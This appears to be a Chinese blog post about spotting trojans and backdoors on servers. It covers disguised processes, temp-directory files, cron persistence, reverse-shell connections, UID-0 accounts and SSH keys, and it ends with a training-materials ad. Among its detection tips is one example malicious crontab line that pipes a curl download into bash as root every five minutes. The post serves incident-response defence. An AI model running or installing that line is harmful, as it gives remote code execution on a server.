☰
常见木马特征盘点,快速排查服务器后门
2026/9/28 18:28:47 网站建设 项目流程

常见木马特征盘点,快速排查服务器后门

前言

服务器被植入木马、留下后门是运维、安全人员日常工作中高频遇到的安全事件。很多时候攻击者拿到服务器权限后,不会立刻搞破坏,而是悄悄种下木马、预留后门,长期潜伏,窃取数据、挖矿、作为跳板横向渗透。

很多新手排查服务器时,只会简单看一下进程,很容易被伪装后的木马绕过。本文整理服务器上木马与后门最常见的特征,同时附带排查思路,不需要复杂工具,仅凭系统自带命令就能初步筛查,适合线上服务器应急排查。

提示:本文仅用于企业内部安全自查、学习防御思路,严禁用于未授权的渗透测试,未经授权扫描、入侵服务器属于违法行为。

一、异常进程类木马特征

木马运行必然会产生进程,攻击者通常会对进程做伪装,这也是最优先排查的点位。

1. 进程名仿冒系统程序

攻击者喜欢把木马程序命名成和系统原生进程几乎一样的名字,混淆管理员视线。

  • Linux 示例:systemd→systemd-、sysytemd、system;sshd→sshd1;bash→bashd
  • Windows 示例:svchost.exe、explorer.exe仿冒进程,正常 svchost 会伴随对应的服务,单独独立运行的 svchost 要重点怀疑。

排查命令(Linux)

ps -ef | less # 查看CPU、内存占用异常进程 top # 查看进程对应的可执行文件路径 ls -l /proc/[PID]/exe

重点关注:进程路径不在系统默认目录(/bin、/usr/bin),而是在/tmp、/var/tmp、/dev/shm、用户家目录下。

2. 资源占用异常:挖矿木马典型特征

挖矿木马是服务器最常见木马之一,特征非常明显:

  • CPU 长期 90% 以上满载,服务器业务负载并不高;
  • 部分挖矿木马会限制自身占用,不会直接跑满,但持续占用 20%~40%;
  • 部分挖矿会占用大量内存,磁盘读写升高。

排查要点:top 看到不知名进程高占用,查看进程文件是否位于临时目录,md5 全网比对,判断是否为已知挖矿样本。

3. 隐藏进程(Rootkit 类木马)

高级 Rootkit 木马会 hook 系统调用,ps、top看不到进程,但实际在后台运行。
排查思路:

  1. 查看/proc目录,枚举 PID,比对 ps 输出,找出 ps 看不到的 PID;
  2. 使用lsattr检查文件隐藏属性;
  3. 检查内核模块,lsmod,陌生 ko 内核模块高度可疑。

二、恶意文件特征:木马 / 后门文件藏身点

攻击者偏爱放在可写、容易被忽略的临时目录,这些目录经常被清理,也容易被管理员忽略。

1. 高危目录清单(重点排查)

Linux 服务器重点目录:
/tmp、/var/tmp、/dev/shm、/root/.隐藏目录、/home/*/.隐藏目录、/usr/local/bin、/etc/cron.d

Windows 服务器重点目录:
C:\Temp、C:\Windows\Temp、AppData\Roaming、ProgramData

2. 文件特征

  1. 隐藏文件:Linux 以.开头隐藏文件,例如.backdoor.sh、.miner;Windows 设置隐藏属性文件。
  2. 时间异常文件:文件修改时间和正常业务文件时间差异巨大,或者大量文件时间被篡改。
# 查找最近24小时新增文件 find /tmp -type f -mtime -1
  1. 奇怪文件名:乱码文件名、空白文件名、特殊不可见字符文件名。
  2. 文件权限异常:木马脚本经常赋予 777 最高权限。
find /tmp -perm 777
  1. 二进制文件:无版本信息、无签名、文件体积很小,静态扫描存在恶意字符串(connect、reverse、shell、backdoor)。

三、计划任务后门(持久化木马重灾区)

攻击者拿到服务器权限,第一件事往往是添加定时任务,保证木马重启后自动运行,这是最容易忽略的后门。

Linux 计划任务排查点位

  1. 用户级 crontab:crontab -l查看当前用户定时任务,root 用户必须重点检查
  2. 系统定时任务目录
/etc/crontab /etc/cron.d/* /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/

恶意定时任务典型特征:

  • 定时执行 wget/curl 下载远程脚本;
  • 任务执行地址为陌生外网 IP、域名;
  • 任务执行脚本放在 /tmp、/dev/shm;
  • 任务里面有 base64 编码字符串,直接解码执行 shell。

示例恶意 crontab:

*/5 * * * * root curl shturl.cc/0AgLrcGkubBl | bash

Windows 计划任务

任务计划程序中,不知名任务,触发条件为开机 / 登录,启动程序路径在 Temp 目录。

四、网络连接特征:反弹 Shell、远控木马

木马本质大多需要和攻击者服务器通信,查看网络连接可以快速定位后门。

常见恶意网络特征

  1. 陌生外网出站连接:服务器主动对外发起连接,业务没有这个对外访问需求;
  2. 长期存在的 ESTABLISHED 稳定长连接,大概率是反弹 shell、远控木马;
  3. 监听端口异常:陌生端口本地监听,非业务端口。

Linux 排查命令:

# 查看所有网络连接 netstat -antlp # 新版推荐ss ss -antlp

重点观察:

  • 进程 PID + 程序名称;
  • 外部 IP 是否为恶意 IP 段;
  • 业务不需要监听端口却在监听。

注意:部分木马会使用 UDP 通信,不要只看 TCP。

五、账号与 SSH 后门特征

很多后门不依靠木马程序,直接留下账号后门,属于服务器高频后门类型。

  1. 新增可疑账号
    Linux:cat /etc/passwd,查看 UID=0 的账号(root 权限账号),除 root 以外其他 UID0 账号都是后门。
awk -F: '$3==0 {print}' /etc/passwd

Windows:查看本地管理员组,陌生管理员账号。

  1. SSH 后门
  • 未知公钥写入~/.ssh/authorized_keys;
  • 修改 sshd 配置,开启弱密码、允许 root 远程登录;
  • 替换 ssh 二进制文件,伪造 ssh 后门。

排查:查看所有用户目录下.ssh文件夹,检查 authorized_keys 里面陌生公钥。

六、系统启动项、服务类木马持久化

Linux

  • /etc/rc.local里面恶意执行脚本;
  • systemd 服务:/etc/systemd/system/下陌生 service 单元,开机自动启动恶意程序。
systemctl list-unit-files

Windows

注册表启动项、服务、WMI 事件订阅,都是木马持久化手段。

七、日志异常辅助判断

木马入侵往往会篡改日志,日志本身的异常也可以作为木马特征:

  1. 日志被清空、大量日志缺失;
  2. 日志时间跳变;
  3. 存在大量失败登录,紧接着出现一次成功登录;
  4. 大量 wget/curl 下载记录、bash 执行记录。

Linux 查看登录日志:

last lastlog

八、快速排查简易检查清单(应急直接复制使用)

应急排查服务器后门,按顺序执行,快速初筛:

  1. 查看 CPU 内存异常进程top,查看可疑进程的 exe 链接;
  2. 扫描临时目录/tmp /dev/shm /var/tmp查找最近新增文件;
  3. 查看所有用户 crontab 和 /etc/cron.d 目录;
  4. 检查所有用户的 ssh 公钥 authorized_keys;
  5. 查找 passwd 中 UID 为 0 账号;
  6. ss/netstat 查看异常出站、监听端口;
  7. 检查 systemd 服务、rc.local 启动脚本;
  8. 查看登录日志 last、lastlog,判断入侵时间点。

九、发现木马后门之后的应急建议

  1. 不要直接重启服务器:很多木马重启后会丢失现场,优先保留证据;
  2. 隔离主机:断开网络,避免横向渗透内网其他服务器;
  3. 保留样本:对恶意文件做 hash 备份,不要直接在线执行;
  4. 溯源分析:判断入侵入口,是弱密码、漏洞上传还是 webshell;
  5. 清除后门:只删除文件不够,定时任务、账号、ssh 密钥、服务都要清理干净;
  6. 修复漏洞,修改所有账号强密码,加固 SSH 策略。

结尾

服务器木马和后门种类繁多,攻击者手段一直在更新,但万变不离其宗:进程、文件、网络、持久化、账号这五大维度。日常巡检养成定期检查这几项的习惯,可以提前发现潜伏木马,而不是等到挖矿、数据泄露事件爆发才应急处理。

安全排查没有银弹,本文的特征盘点是基础排查手段。遇到高级 Rootkit、内存无文件木马时,还需要内存取证、专业 EDR 工具深度分析。

免责声明:本文内容仅用于安全学习与企业授权范围内服务器安全自查,任何未经授权对服务器进行入侵、后门植入、恶意测试行为,需要承担相应法律责任。


了解网络安全,首先要搞清楚下面这些前提

  • 网络安全到底包含哪些技术?是否需要会编程?
  • 网络安全行业有哪些职业方向?“我”该如何选择?
  • 网络安全的职业发展和成长路线是什么?

如果你是准备学习网络安全(黑客)或者正在学习,下面这些你应该能用得上:

①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

一、网络安全(黑客)学习路线

网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

二、网络安全教程视频

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

三、网络安全CTF实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

四、网络安全面试题

最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。

网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。

机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!

这份完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询